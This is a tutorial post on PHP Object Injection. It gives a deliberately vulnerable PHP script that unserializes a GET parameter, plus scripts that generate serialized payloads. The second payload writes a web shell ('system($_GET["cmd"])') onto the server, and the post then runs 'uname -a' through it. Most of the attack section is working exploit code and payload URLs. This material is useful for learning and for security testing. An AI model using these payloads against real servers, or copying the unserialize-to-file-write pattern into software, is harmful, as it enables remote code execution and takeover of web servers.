FileName : phpoi.php
<?php
class WebApp {
public $logfile = null;
public $logdata = null;
public function OITest() {
echo '[+] Hello world. This is Function call to OITest();<br/>';
$this->logfile = 'logs.txt';
$this->logdata = 'Log Data : Success';
}
public function __destruct() {
file_put_contents(DIR . '/' . $this->logfile, $this->logdata);
echo '[*] Data is written to the file.<br/>';
}
}
$input = unserialize($_GET['data']);
$obj = new WebApp;
$obj->OITest();
?>
At above program, there is a class named "WebApp", there are 2 variables within the class, and the values are assigned to the variables by calling IOTest() class function, and at the end of execution, __destruct function will triggered, which write the content of variable $logdata into file logs.txt (which is stored within $logfile variable) on the current web directory by using file_put_contents() function and prints the message "[*] Data is written to the file". Also note that there's unserialize() function is used, which deserialize the users input in provided with GET method ( GET['data' ] ) and store the output on variable named '$input', but program does not use this deserialze object. which Now lets run the program.Note : For this demonstration i am using Lamp stack with Ubuntu server16.4 VM.
Output :
And the "logs.txt" file is also created. But there is also an user provided object named $input. So when we provide a serialized object with get parameter, then it is unserialized and written on the file by __destruct() function. Now lets see how it works, but first we have to generate the serialized object string and for this we are going to use below code :
Filename : generate1.php
<?php
class WebApp {
public $logfile = "file.txt";
public $logdata = "This is Simple Test file.";
}
$obj = new WebApp;
echo htmlspecialchars(serialize($obj));
?>
Note that the structure of the class needs to be same as target application's class. The output is : O:6:"WebApp":2:{s:7:"logfile";s:8:"file.txt";s:7:"logdata";s:25:"This is Simple Test file.";} /phpoi.php?data=O:6:"WebApp":2:{s:7:"logfile";s:8:"file.txt";s:7:"logdata";s:25:"This is Simple Test file.";}
Note that the message will written twice, means our provided logdata will written on the newly created file "file.txt".
Now by similar method we can also write a php shell on the web server, and achieve code execution on the vulnerable server. PHP code to generate serialized string for php shell is :
Filename : generate2.php
<?php
class WebApp {
public $logfile = "shell.php";
public $logdata = '<?php system($_GET["cmd"]); ?>';
}
$obj = new WebApp;
echo htmlspecialchars(serialize($obj));
?>
Output : O:6:"WebApp":2:{s:7:"logfile";s:9:"shell.php";s:7:"logdata";s:30:"<?php system($_GET["cmd"]); ?>";} /phpoi.php?data=O:6:"WebApp":2:{s:7:"logfile";s:9:"shell.php";s:7:"logdata";s:30:"<?php system($_GET["cmd"]); ?>";}
looks like our php web-shell is successfully written on web server. Now lets try to execute command on the server.
/shell.php?cmd=uname -a
and, it works. Means we successfully exploited. Note that this is one of the various methods to exploit PHP Object Injection vulnerability. An attacker can also use other magic function like __construct(), call(), sleep(), __wakeup, toString etc. depending on the web application code flow to manipulate class variables in order to attack the web application.
All the php codes used here can be downloaded from : Github Link
Conclusion :
The PHP Serialization bugs are not a common vulnerability and it is very difficult to exploit this bug. Although it could be only found by source code reviews or white box testing. Some of the popular php based CMS systems affected by Object Injection vulnerability are WordPress 3.6.1, Magento 1.9.0.1, Joomla 3.0.3, IP Board 3.3.4.
PHP Object Injection : Part 1
References :
https://mukarramkhalid.com/php-object-injection-serialization/
https://securitycafe.ro/2015/01/05/understanding-php-object-injection/